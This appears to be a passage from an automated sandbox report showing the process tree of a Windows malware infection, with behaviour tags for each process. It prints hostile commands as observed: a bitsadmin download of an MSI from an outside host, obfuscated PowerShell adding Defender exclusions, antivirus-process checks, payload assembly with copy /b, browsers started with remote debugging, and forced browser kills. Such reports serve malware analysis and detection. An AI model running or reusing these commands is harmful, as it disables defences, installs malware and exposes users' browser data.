        Suspicious use of NtCreateUserProcessOtherParentProcess
        Executes dropped EXE
        System Location Discovery: System Language Discovery
        Suspicious behavior: EnumeratesProcesses
        Suspicious use of FindShellTrayWindow
        Suspicious use of SendNotifyMessage
        
        PID:2636
        
        C:\Users\Admin\AppData\Local\Temp\789919\RegAsm.exe
        
        C:\Users\Admin\AppData\Local\Temp\789919\RegAsm.exe
        7⤵
        Executes dropped EXE
        Suspicious use of SetThreadContext
        System Location Discovery: System Language Discovery
        Suspicious use of AdjustPrivilegeToken
        
        PID:5804
        
        C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe
        
        "C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe"
        8⤵
        System Location Discovery: System Language Discovery
        Suspicious use of AdjustPrivilegeToken
        
        PID:3336
      - C:\Windows\SysWOW64\choice.exe
        
        choice /d y /t 5
        6⤵
        System Location Discovery: System Language Discovery
        
        PID:3780
  - - C:\Windows\SysWOW64\cmd.exe
      "C:\Windows\System32\cmd.exe" /C "C:\Users\Admin\AppData\Local\Temp\10141511121\EDM8nAR.cmd"
      4⤵
      System Location Discovery: System Language Discovery
      Suspicious use of WriteProcessMemory
      PID:680
    - - C:\Windows\SysWOW64\fltMC.exe
        
        fltmc
        5⤵
        
        PID:1564
    - - C:\Windows\SysWOW64\bitsadmin.exe
        
        bitsadmin /transfer "DownloadVrep" https://authenticatior.com/vrep.msi "C:\Users\Admin\AppData\Local\Temp\vrep_install\vrep.msi"
        5⤵
        Download via BitsAdmin
        System Location Discovery: System Language Discovery
        
        PID:4436
  - - C:\Users\Admin\AppData\Local\Temp\10141520101\mIrI3a9.exe
      "C:\Users\Admin\AppData\Local\Temp\10141520101\mIrI3a9.exe"
      4⤵
      Downloads MZ/PE file
      Checks computer location settings
      Executes dropped EXE
      System Location Discovery: System Language Discovery
      Suspicious behavior: EnumeratesProcesses
      Suspicious use of AdjustPrivilegeToken
      PID:2876
    - - C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
        
        "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass -w 1 -c ".([char]65+[char]100+[char]100+[char]45+[char]77+[char]112+[char]80+[char]114+[char]101+[char]102+[char]101+[char]114+[char]101+[char]110+[char]99+[char]101) -ExclusionPath ([Char]67+[Char]58+[Char]92);.([char]65+[char]100+[char]100+[char]45+[char]77+[char]112+[char]80+[char]114+[char]101+[char]102+[char]101+[char]114+[char]101+[char]110+[char]99+[char]101) -ExclusionExtension 'exe'"
        5⤵
        Command and Scripting Interpreter: PowerShell
        System Location Discovery: System Language Discovery
        Suspicious behavior: EnumeratesProcesses
        Suspicious use of AdjustPrivilegeToken
        
        PID:808
    - - C:\Users\Admin\AppData\Roaming\a.exe
        
        "C:\Users\Admin\AppData\Roaming\a.exe"
        5⤵
        Downloads MZ/PE file
        Executes dropped EXE
        Accesses Microsoft Outlook profiles
        System Location Discovery: System Language Discovery
        Suspicious use of AdjustPrivilegeToken
        outlook_office_path
        outlook_win_path
        
        PID:4392
      - C:\Users\Admin\AppData\Local\Temp\Gyfhvf.exe
        
        "C:\Users\Admin\AppData\Local\Temp\Gyfhvf.exe"
        6⤵
        Checks computer location settings
        Executes dropped EXE
        Adds Run key to start application
        Suspicious use of SetThreadContext
        Suspicious use of AdjustPrivilegeToken
        
        PID:5628
        
        C:\Users\Admin\AppData\Local\Temp\Vhbyv.exe
        
        "C:\Users\Admin\AppData\Local\Temp\Vhbyv.exe"
        7⤵
        Executes dropped EXE
        Adds Run key to start application
        Suspicious use of SetThreadContext
        Suspicious use of AdjustPrivilegeToken
        
        PID:6412
        
        C:\Users\Admin\AppData\Local\Temp\Vhbyv.exe
        
        "C:\Users\Admin\AppData\Local\Temp\Vhbyv.exe"
        8⤵
        Executes dropped EXE
        
        PID:6904
        
        C:\Users\Admin\AppData\Local\Temp\Gyfhvf.exe
        
        "C:\Users\Admin\AppData\Local\Temp\Gyfhvf.exe"
        7⤵
        Executes dropped EXE
        System Location Discovery: System Language Discovery
        Suspicious behavior: AddClipboardFormatListener
        Suspicious use of AdjustPrivilegeToken
        
        PID:4652
  - - C:\Users\Admin\AppData\Local\Temp\10141530101\FvbuInU.exe
      "C:\Users\Admin\AppData\Local\Temp\10141530101\FvbuInU.exe"
      4⤵
      Identifies VirtualBox via ACPI registry values (likely anti-VM)
      Checks BIOS information in registry
      Executes dropped EXE
      Identifies Wine through registry keys
      Suspicious use of NtSetInformationThreadHideFromDebugger
      Suspicious behavior: EnumeratesProcesses
      PID:644
  - - C:\Users\Admin\AppData\Local\Temp\10141540101\v6Oqdnc.exe
      "C:\Users\Admin\AppData\Local\Temp\10141540101\v6Oqdnc.exe"
      4⤵
      Identifies VirtualBox via ACPI registry values (likely anti-VM)
      Checks BIOS information in registry
      Executes dropped EXE
      Identifies Wine through registry keys
      Suspicious use of NtSetInformationThreadHideFromDebugger
      System Location Discovery: System Language Discovery
      Suspicious behavior: EnumeratesProcesses
      PID:3472
  - - C:\Users\Admin\AppData\Local\Temp\10141550101\HmngBpR.exe
      "C:\Users\Admin\AppData\Local\Temp\10141550101\HmngBpR.exe"
      4⤵
      Executes dropped EXE
      Suspicious use of SetWindowsHookEx
      PID:6020
    - - C:\Users\Admin\AppData\Local\Temp\archivebrowser_GD\SplashWin.exe
        
        C:\Users\Admin\AppData\Local\Temp\archivebrowser_GD\SplashWin.exe
        5⤵
        Executes dropped EXE
        Loads dropped DLL
        
        PID:5704
      - C:\Users\Admin\AppData\Roaming\archivebrowser_GD\SplashWin.exe
        
        C:\Users\Admin\AppData\Roaming\archivebrowser_GD\SplashWin.exe
        6⤵
        Executes dropped EXE
        Loads dropped DLL
        Suspicious use of SetThreadContext
        System Location Discovery: System Language Discovery
        Suspicious behavior: MapViewOfSection
        
        PID:5240
        
        C:\Windows\SysWOW64\cmd.exe
        
        C:\Windows\SysWOW64\cmd.exe
        7⤵
        Drops startup file
        Suspicious behavior: MapViewOfSection
        
        PID:7124
        
        C:\Windows\SysWOW64\explorer.exe
        
        C:\Windows\SysWOW64\explorer.exe
        8⤵
        System Location Discovery: System Language Discovery
        Suspicious behavior: AddClipboardFormatListener
        Suspicious behavior: GetForegroundWindowSpam
        Suspicious use of SetWindowsHookEx
        
        PID:6288
  - - C:\Users\Admin\AppData\Local\Temp\10141560101\PfOHmro.exe
      "C:\Users\Admin\AppData\Local\Temp\10141560101\PfOHmro.exe"
      4⤵
      Executes dropped EXE
      Suspicious use of SetThreadContext
      System Location Discovery: System Language Discovery
      PID:5152
    - - C:\Users\Admin\AppData\Local\Temp\10141560101\PfOHmro.exe
        
        "C:\Users\Admin\AppData\Local\Temp\10141560101\PfOHmro.exe"
        5⤵
        Downloads MZ/PE file
        Checks computer location settings
        Executes dropped EXE
        System Location Discovery: System Language Discovery
        Suspicious use of AdjustPrivilegeToken
        
        PID:6272
      - C:\Users\Admin\AppData\Local\Temp\EdgeBHO.exe
        
        "C:\Users\Admin\AppData\Local\Temp\EdgeBHO.exe"
        6⤵
        Executes dropped EXE
        
        PID:9568
        
        C:\Users\Admin\AppData\Local\Temp\EdgeBHO.exe
        
        "C:\Users\Admin\AppData\Local\Temp\EdgeBHO.exe"
        7⤵
        Executes dropped EXE
        Loads dropped DLL
        Adds Run key to start application
        
        PID:10232
    - - C:\Windows\SysWOW64\WerFault.exe
        
        C:\Windows\SysWOW64\WerFault.exe -u -p 5152 -s 800
        5⤵
        Program crash
        
        PID:5744
  - - C:\Users\Admin\AppData\Local\Temp\10141580101\mAtJWNv.exe
      "C:\Users\Admin\AppData\Local\Temp\10141580101\mAtJWNv.exe"
      4⤵
      Executes dropped EXE
      Suspicious use of SetThreadContext
      PID:5784
    - - C:\Users\Admin\AppData\Local\Temp\10141580101\mAtJWNv.exe
        
        "C:\Users\Admin\AppData\Local\Temp\10141580101\mAtJWNv.exe"
        5⤵
        Checks computer location settings
        Executes dropped EXE
        Checks processor information in registry
        
        PID:3920
      - C:\Program Files\Google\Chrome\Application\chrome.exe
        
        "C:\Program Files\Google\Chrome\Application\chrome.exe" --remote-debugging-port=9223 --profile-directory="Default"
        6⤵
        Uses browser remote debugging
        Enumerates system info in registry
        Suspicious behavior: NtCreateUserProcessBlockNonMicrosoftBinary
        Suspicious use of AdjustPrivilegeToken
        Suspicious use of FindShellTrayWindow
        
        PID:6688
        
        C:\Program Files\Google\Chrome\Application\chrome.exe
        
        "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=crashpad-handler "--user-data-dir=C:\Users\Admin\AppData\Local\Google\Chrome\User Data" /prefetch:4 --monitor-self-annotation=ptype=crashpad-handler "--database=C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Crashpad" "--metrics-dir=C:\Users\Admin\AppData\Local\Google\Chrome\User Data" --url=https://clients2.google.com/cr/report --annotation=channel= --annotation=plat=Win64 --annotation=prod=Chrome --annotation=ver=123.0.6312.123 --initial-client-data=0xf8,0xfc,0x100,0xd4,0x104,0x7ffcf8bfcc40,0x7ffcf8bfcc4c,0x7ffcf8bfcc58
        7⤵
        
        PID:4856
        
        C:\Program Files\Google\Chrome\Application\chrome.exe
        
        "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=gpu-process --no-appcompat-clear --gpu-preferences=WAAAAAAAAADgAAAMAAAAAAAAAAAAAAAAAABgAAEAAAA4AAAAAAAAAAAAAAAEAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAGAAAAAAAAAAYAAAAAAAAAAgAAAAAAAAACAAAAAAAAAAIAAAAAAAAAA== --field-trial-handle=1904,i,2551329647954073238,12343984249480746446,262144 --variations-seed-version=20250216-180425.389000 --mojo-platform-channel-handle=1900 /prefetch:2
        7⤵
        
        PID:7076
        
        C:\Program Files\Google\Chrome\Application\chrome.exe
        
        "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --lang=en-US --service-sandbox-type=none --no-appcompat-clear --field-trial-handle=2132,i,2551329647954073238,12343984249480746446,262144 --variations-seed-version=20250216-180425.389000 --mojo-platform-channel-handle=2176 /prefetch:3
        7⤵
        
        PID:6392
        
        C:\Program Files\Google\Chrome\Application\chrome.exe
        
        "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=storage.mojom.StorageService --lang=en-US --service-sandbox-type=service --no-appcompat-clear --field-trial-handle=2204,i,2551329647954073238,12343984249480746446,262144 --variations-seed-version=20250216-180425.389000 --mojo-platform-channel-handle=2376 /prefetch:8
        7⤵
        
        PID:6208
        
        C:\Program Files\Google\Chrome\Application\chrome.exe
        
        "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --no-appcompat-clear --remote-debugging-port=9223 --lang=en-US --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=6 --field-trial-handle=3168,i,2551329647954073238,12343984249480746446,262144 --variations-seed-version=20250216-180425.389000 --mojo-platform-channel-handle=3176 /prefetch:1
        7⤵
        Uses browser remote debugging
        
        PID:6692
        
        C:\Program Files\Google\Chrome\Application\chrome.exe
        
        "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --no-appcompat-clear --remote-debugging-port=9223 --lang=en-US --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=5 --field-trial-handle=3184,i,2551329647954073238,12343984249480746446,262144 --variations-seed-version=20250216-180425.389000 --mojo-platform-channel-handle=3208 /prefetch:1
        7⤵
        Uses browser remote debugging
        
        PID:4772
        
        C:\Program Files\Google\Chrome\Application\chrome.exe
        
        "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --no-appcompat-clear --remote-debugging-port=9223 --lang=en-US --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=7 --field-trial-handle=4520,i,2551329647954073238,12343984249480746446,262144 --variations-seed-version=20250216-180425.389000 --mojo-platform-channel-handle=4432 /prefetch:1
        7⤵
        Uses browser remote debugging
        
        PID:184
        
        C:\Program Files\Google\Chrome\Application\chrome.exe
        
        "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=data_decoder.mojom.DataDecoderService --lang=en-US --service-sandbox-type=service --no-appcompat-clear --field-trial-handle=4416,i,2551329647954073238,12343984249480746446,262144 --variations-seed-version=20250216-180425.389000 --mojo-platform-channel-handle=4632 /prefetch:8
        7⤵
        
        PID:5724
        
        C:\Program Files\Google\Chrome\Application\chrome.exe
        
        "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=data_decoder.mojom.DataDecoderService --lang=en-US --service-sandbox-type=service --no-appcompat-clear --field-trial-handle=4188,i,2551329647954073238,12343984249480746446,262144 --variations-seed-version=20250216-180425.389000 --mojo-platform-channel-handle=4228 /prefetch:8
        7⤵
        
        PID:6980
        
        C:\Program Files\Google\Chrome\Application\chrome.exe
        
        "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=data_decoder.mojom.DataDecoderService --lang=en-US --service-sandbox-type=service --no-appcompat-clear --field-trial-handle=4880,i,2551329647954073238,12343984249480746446,262144 --variations-seed-version=20250216-180425.389000 --mojo-platform-channel-handle=4888 /prefetch:8
        7⤵
        
        PID:1300
        
        C:\Program Files\Google\Chrome\Application\chrome.exe
        
        "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=data_decoder.mojom.DataDecoderService --lang=en-US --service-sandbox-type=service --no-appcompat-clear --field-trial-handle=4884,i,2551329647954073238,12343984249480746446,262144 --variations-seed-version=20250216-180425.389000 --mojo-platform-channel-handle=4712 /prefetch:8
        7⤵
        
        PID:6984
        
        C:\Program Files\Google\Chrome\Application\chrome.exe
        
        "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=data_decoder.mojom.DataDecoderService --lang=en-US --service-sandbox-type=service --no-appcompat-clear --field-trial-handle=5248,i,2551329647954073238,12343984249480746446,262144 --variations-seed-version=20250216-180425.389000 --mojo-platform-channel-handle=5240 /prefetch:8
        7⤵
        
        PID:3580
      - C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
        
        "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --remote-debugging-port=9223 --profile-directory="Default"
        6⤵
        Uses browser remote debugging
        Enumerates system info in registry
        Suspicious behavior: NtCreateUserProcessBlockNonMicrosoftBinary
        Suspicious use of FindShellTrayWindow
        
        PID:5236
        
        C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
        
        "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=crashpad-handler "--user-data-dir=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data" /prefetch:7 --monitor-self-annotation=ptype=crashpad-handler "--database=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Crashpad" "--metrics-dir=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data" --annotation=IsOfficialBuild=1 --annotation=channel= --annotation=chromium-version=92.0.4515.131 "--annotation=exe=C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --annotation=plat=Win64 "--annotation=prod=Microsoft Edge" --annotation=ver=92.0.902.67 --initial-client-data=0xfc,0x100,0x104,0xd8,0x108,0x7ffcf91c46f8,0x7ffcf91c4708,0x7ffcf91c4718
        7⤵
        Checks processor information in registry
        Enumerates system info in registry
        
        PID:6956
        
        C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
        
        "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=gpu-process --field-trial-handle=2196,6120084306183889742,2472761088856088124,131072 --gpu-preferences=UAAAAAAAAADgAAAQAAAAAAAAAAAAAAAAAABgAAAAAAAwAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAHgAAAAAAAAAeAAAAAAAAAAoAAAABAAAACAAAAAAAAAAKAAAAAAAAAAwAAAAAAAAADgAAAAAAAAAEAAAAAAAAAAAAAAADQAAABAAAAAAAAAAAQAAAA0AAAAQAAAAAAAAAAQAAAANAAAAEAAAAAAAAAAHAAAADQAAAAgAAAAAAAAACAAAAAAAAAA= --mojo-platform-channel-handle=2208 /prefetch:2
        7⤵
        
        PID:6724
        
        C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
        
        "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --field-trial-handle=2196,6120084306183889742,2472761088856088124,131072 --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=2260 /prefetch:3
        7⤵
        
        PID:6924
        
        C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
        
        "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=storage.mojom.StorageService --field-trial-handle=2196,6120084306183889742,2472761088856088124,131072 --lang=en-US --service-sandbox-type=utility --mojo-platform-channel-handle=2920 /prefetch:8
        7⤵
        
        PID:4852
        
        C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
        
        "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --remote-debugging-port=9223 --field-trial-handle=2196,6120084306183889742,2472761088856088124,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=6 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=3244 /prefetch:1
        7⤵
        Uses browser remote debugging
        
        PID:7236
        
        C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
        
        "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --remote-debugging-port=9223 --field-trial-handle=2196,6120084306183889742,2472761088856088124,131072 --lang=en-US --disable-client-side-phishing-detection --instant-process --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=5 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=3260 /prefetch:1
        7⤵
        Uses browser remote debugging
        
        PID:7284
        
        C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
        
        "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --remote-debugging-port=9223 --field-trial-handle=2196,6120084306183889742,2472761088856088124,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=7 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=4804 /prefetch:1
        7⤵
        Uses browser remote debugging
        
        PID:7148
        
        C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
        
        "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --remote-debugging-port=9223 --field-trial-handle=2196,6120084306183889742,2472761088856088124,131072 --lang=en-US --disable-client-side-phishing-detection --instant-process --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=8 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=4920 /prefetch:1
        7⤵
        Uses browser remote debugging
        
        PID:6520
      - C:\Windows\SysWOW64\cmd.exe
        
        "C:\Windows\system32\cmd.exe" /c timeout /t 11 & rd /s /q "C:\ProgramData\s0zmy" & exit
        6⤵
        
        PID:6004
        
        C:\Windows\SysWOW64\timeout.exe
        
        timeout /t 11
        7⤵
        Delays execution with timeout.exe
        
        PID:6192
    - - C:\Windows\SysWOW64\WerFault.exe
        
        C:\Windows\SysWOW64\WerFault.exe -u -p 5784 -s 772
        5⤵
        Program crash
        
        PID:5408
  - - C:\Users\Admin\AppData\Local\Temp\10141590101\CgmaT61.exe
      "C:\Users\Admin\AppData\Local\Temp\10141590101\CgmaT61.exe"
      4⤵
      Identifies VirtualBox via ACPI registry values (likely anti-VM)
      Checks BIOS information in registry
      Executes dropped EXE
      Identifies Wine through registry keys
      Suspicious use of NtSetInformationThreadHideFromDebugger
      PID:5840
  - - C:\Users\Admin\AppData\Local\Temp\10141600101\zY9sqWs.exe
      "C:\Users\Admin\AppData\Local\Temp\10141600101\zY9sqWs.exe"
      4⤵
      Checks computer location settings
      Executes dropped EXE
      Drops file in Windows directory
      System Location Discovery: System Language Discovery
      PID:5912
    - - C:\Users\Admin\AppData\Local\Temp\845cfbab99\Gxtuum.exe
        
        "C:\Users\Admin\AppData\Local\Temp\845cfbab99\Gxtuum.exe"
        5⤵
        Executes dropped EXE
        System Location Discovery: System Language Discovery
        
        PID:5324
  - - C:\Users\Admin\AppData\Local\Temp\10141610101\ADFoyxP.exe
      "C:\Users\Admin\AppData\Local\Temp\10141610101\ADFoyxP.exe"
      4⤵
      Checks computer location settings
      Executes dropped EXE
      Drops file in Windows directory
      System Location Discovery: System Language Discovery
      PID:3048
    - - C:\Windows\SysWOW64\cmd.exe
        
        "C:\Windows\system32\cmd.exe" /c expand Go.pub Go.pub.bat & Go.pub.bat
        5⤵
        
        PID:412
      - C:\Windows\SysWOW64\expand.exe
        
        expand Go.pub Go.pub.bat
        6⤵
        System Location Discovery: System Language Discovery
        
        PID:5556
      - C:\Windows\SysWOW64\tasklist.exe
        
        tasklist
        6⤵
        Enumerates processes with tasklist
        Suspicious use of AdjustPrivilegeToken
        
        PID:5464
      - C:\Windows\SysWOW64\findstr.exe
        
        findstr /I "opssvc wrsa"
        6⤵
        System Location Discovery: System Language Discovery
        
        PID:4468
      - C:\Windows\SysWOW64\tasklist.exe
        
        tasklist
        6⤵
        Enumerates processes with tasklist
        System Location Discovery: System Language Discovery
        Suspicious use of AdjustPrivilegeToken
        
        PID:7008
      - C:\Windows\SysWOW64\findstr.exe
        
        findstr "bdservicehost AvastUI AVGUI nsWscSvc ekrn SophosHealth"
        6⤵
        
        PID:5796
      - C:\Windows\SysWOW64\cmd.exe
        
        cmd /c md 353090
        6⤵
        System Location Discovery: System Language Discovery
        
        PID:896
      - C:\Windows\SysWOW64\extrac32.exe
        
        extrac32 /Y /E Really.pub
        6⤵
        System Location Discovery: System Language Discovery
        
        PID:6352
      - C:\Windows\SysWOW64\findstr.exe
        
        findstr /V "posted" Good
        6⤵
        System Location Discovery: System Language Discovery
        
        PID:6192
      - C:\Windows\SysWOW64\cmd.exe
        
        cmd /c copy /b 353090\Seat.com + Pf + Somewhere + Volumes + Commission + Lane + Hit + Strong + Copied + Wearing + Acquire 353090\Seat.com
        6⤵
        System Location Discovery: System Language Discovery
        
        PID:4648
      - C:\Windows\SysWOW64\cmd.exe
        
        cmd /c copy /b ..\Maintains.pub + ..\Legislation.pub + ..\Blood.pub + ..\Document.pub + ..\Breaks.pub + ..\Both.pub + ..\Explicitly.pub + ..\Governor.pub + ..\Bull.pub + ..\Comparison.pub + ..\Performing.pub + ..\Gate.pub + ..\Republican.pub + ..\Reverse.pub + ..\Thousand.pub + ..\Apartments.pub + ..\Swingers.pub + ..\Urban.pub + ..\Robert.pub + ..\Regulation.pub + ..\Confusion.pub + ..\Listening.pub + ..\Generating.pub + ..\Argentina.pub + ..\Amenities.pub + ..\Vacation.pub + ..\Vampire.pub + ..\Trademarks.pub + ..\Distinguished.pub + ..\Silly.pub + ..\Hell.pub + ..\Worcester.pub + ..\Concept.pub + ..\Enlarge.pub + ..\Preference.pub + ..\Poem.pub m
        6⤵
        System Location Discovery: System Language Discovery
        
        PID:1424
      - C:\Users\Admin\AppData\Local\Temp\353090\Seat.com
        
        Seat.com m
        6⤵
        Suspicious use of NtCreateUserProcessOtherParentProcess
        Executes dropped EXE
        System Location Discovery: System Language Discovery
        Suspicious use of FindShellTrayWindow
        Suspicious use of SendNotifyMessage
        
        PID:4072
        
        C:\Users\Admin\AppData\Local\Temp\353090\RegAsm.exe
        
        C:\Users\Admin\AppData\Local\Temp\353090\RegAsm.exe
        7⤵
        
        PID:4488
      - C:\Windows\SysWOW64\choice.exe
        
        choice /d y /t 5
        6⤵
        
        PID:5948
  - - C:\Users\Admin\AppData\Local\Temp\10141620101\yUI6F6C.exe
      "C:\Users\Admin\AppData\Local\Temp\10141620101\yUI6F6C.exe"
      4⤵
      Identifies VirtualBox via ACPI registry values (likely anti-VM)
      Checks BIOS information in registry
      Executes dropped EXE
      Identifies Wine through registry keys
      Suspicious use of NtSetInformationThreadHideFromDebugger
      System Location Discovery: System Language Discovery
      PID:6304
  - - C:\Users\Admin\AppData\Local\Temp\10141630101\V0Bt74c.exe
      "C:\Users\Admin\AppData\Local\Temp\10141630101\V0Bt74c.exe"
      4⤵
      Executes dropped EXE
      Suspicious use of SetThreadContext
      System Location Discovery: System Language Discovery
      PID:2044
    - - C:\Users\Admin\AppData\Local\Temp\10141630101\V0Bt74c.exe
        
        "C:\Users\Admin\AppData\Local\Temp\10141630101\V0Bt74c.exe"
        5⤵
        Executes dropped EXE
        System Location Discovery: System Language Discovery
        
        PID:5516
    - - C:\Windows\SysWOW64\WerFault.exe
        
        C:\Windows\SysWOW64\WerFault.exe -u -p 2044 -s 796
        5⤵
        Program crash
        
        PID:6188
  - - C:\Users\Admin\AppData\Local\Temp\10141640101\ReK7Ewx.exe
      "C:\Users\Admin\AppData\Local\Temp\10141640101\ReK7Ewx.exe"
      4⤵
      Checks computer location settings
      Executes dropped EXE
      Drops file in Windows directory
      System Location Discovery: System Language Discovery
      PID:5044
    - - C:\Windows\SysWOW64\cmd.exe
        
        "C:\Windows\system32\cmd.exe" /c expand Ae.msi Ae.msi.bat & Ae.msi.bat
        5⤵
        System Location Discovery: System Language Discovery
        
        PID:5816
      - C:\Windows\SysWOW64\expand.exe
        
        expand Ae.msi Ae.msi.bat
        6⤵
        
        PID:7248
      - C:\Windows\SysWOW64\tasklist.exe
        
        tasklist
        6⤵
        Enumerates processes with tasklist
        System Location Discovery: System Language Discovery
        Suspicious use of AdjustPrivilegeToken
        
        PID:5312
      - C:\Windows\SysWOW64\findstr.exe
        
        findstr /I "opssvc wrsa"
        6⤵
        
        PID:5504
      - C:\Windows\SysWOW64\tasklist.exe
        
        tasklist
        6⤵
        Enumerates processes with tasklist
        System Location Discovery: System Language Discovery
        Suspicious use of AdjustPrivilegeToken
        
        PID:7240
      - C:\Windows\SysWOW64\findstr.exe
        
        findstr "bdservicehost AvastUI AVGUI nsWscSvc ekrn SophosHealth"
        6⤵
        System Location Discovery: System Language Discovery
        
        PID:7244
      - C:\Windows\SysWOW64\cmd.exe
        
        cmd /c md 789919
        6⤵
        System Location Discovery: System Language Discovery
        
        PID:7880
      - C:\Windows\SysWOW64\extrac32.exe
        
        extrac32 /Y /E Deviation.msi
        6⤵
        
        PID:7592
      - C:\Windows\SysWOW64\cmd.exe
        
        cmd /c copy /b 789919\Occupation.com + Kate + Invisible + Tells + Gross + Amend + Foul + Snowboard + Digital + Fraud 789919\Occupation.com
        6⤵
        System Location Discovery: System Language Discovery
        
        PID:7872
      - C:\Windows\SysWOW64\cmd.exe
        
        cmd /c copy /b ..\Drug.msi + ..\Contributors.msi + ..\Anthropology.msi + ..\Activities.msi + ..\Opens.msi + ..\Having.msi + ..\Dimension.msi + ..\Responding.msi + ..\Series.msi + ..\Salem.msi q
        6⤵
        System Location Discovery: System Language Discovery
        
        PID:7988
      - C:\Users\Admin\AppData\Local\Temp\789919\Occupation.com
        
        Occupation.com q
        6⤵
        Executes dropped EXE
        Suspicious use of FindShellTrayWindow
        Suspicious use of SendNotifyMessage
        
        PID:8036
      - C:\Windows\SysWOW64\choice.exe
        
        choice /d y /t 5
        6⤵
        
        PID:8064
  - - C:\Users\Admin\AppData\Local\Temp\10141650101\afe14a332c.exe
      "C:\Users\Admin\AppData\Local\Temp\10141650101\afe14a332c.exe"
      4⤵
      Identifies VirtualBox via ACPI registry values (likely anti-VM)
      Downloads MZ/PE file
      Checks BIOS information in registry
      Executes dropped EXE
      Identifies Wine through registry keys
      Suspicious use of NtSetInformationThreadHideFromDebugger
      System Location Discovery: System Language Discovery
      PID:2632
    - - C:\Users\Admin\AppData\Local\Temp\9S3WM9XDGZ4D8BWQTGUTTQAKK.exe
        
        "C:\Users\Admin\AppData\Local\Temp\9S3WM9XDGZ4D8BWQTGUTTQAKK.exe"
        5⤵
        Identifies VirtualBox via ACPI registry values (likely anti-VM)
        Checks BIOS information in registry
        Executes dropped EXE
        Identifies Wine through registry keys
        Suspicious use of NtSetInformationThreadHideFromDebugger
        System Location Discovery: System Language Discovery
        
        PID:8136
  - - C:\Users\Admin\AppData\Local\Temp\10141660101\10ff9f0669.exe
      "C:\Users\Admin\AppData\Local\Temp\10141660101\10ff9f0669.exe"
      4⤵
      Identifies VirtualBox via ACPI registry values (likely anti-VM)
      Checks BIOS information in registry
      Executes dropped EXE
      Identifies Wine through registry keys
      Suspicious use of NtSetInformationThreadHideFromDebugger
      PID:7852
  - - C:\Users\Admin\AppData\Local\Temp\10141670101\f953d9af5b.exe
      "C:\Users\Admin\AppData\Local\Temp\10141670101\f953d9af5b.exe"
      4⤵
      Executes dropped EXE
      System Location Discovery: System Language Discovery
      Suspicious use of FindShellTrayWindow
      Suspicious use of SendNotifyMessage
      PID:2208
    - - C:\Windows\SysWOW64\taskkill.exe
        
        taskkill /F /IM firefox.exe /T
        5⤵
        System Location Discovery: System Language Discovery
        Kills process with taskkill
        Suspicious use of AdjustPrivilegeToken
        
        PID:4092
    - - C:\Windows\SysWOW64\taskkill.exe
        
        taskkill /F /IM chrome.exe /T
        5⤵
        Kills process with taskkill
        Suspicious use of AdjustPrivilegeToken
        
        PID:2788
    - - C:\Windows\SysWOW64\taskkill.exe
        
        taskkill /F /IM msedge.exe /T
        5⤵
        Kills process with taskkill
        Suspicious use of AdjustPrivilegeToken
        
        PID:8272
    - - C:\Windows\SysWOW64\taskkill.exe
        
        taskkill /F /IM opera.exe /T
        5⤵
        System Location Discovery: System Language Discovery
        Kills process with taskkill
